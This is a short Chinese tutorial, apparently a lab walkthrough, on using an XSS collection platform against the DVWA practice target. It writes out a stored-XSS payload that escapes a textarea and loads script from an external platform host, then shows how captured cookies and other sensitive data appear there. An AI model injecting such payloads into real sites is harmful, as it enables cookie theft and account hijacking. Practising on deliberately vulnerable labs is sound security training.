1. xss平台
可以帮助链接被xss的站点,获取xss站点被攻击后的信息类似beef[beef下节有介绍]。
2. 创建项目

image.png
3. 配置模块
以默认模块为例:

image.png
拉到页面下方选择下一步。
4. 准备植入xss代码
以dvwa为例:
选择xss平台给出的示例方法:

image.png
向dvwa靶场植入下列语言:
</textarea>'"><script src=https://xsspt.com/q9LMWD?1596957037></script>
5. 向靶场植入xss代码

image.png
点击 submit
6. xss平台获取xss站点信息

image.png
点击展开看到cookie等敏感信息

image.png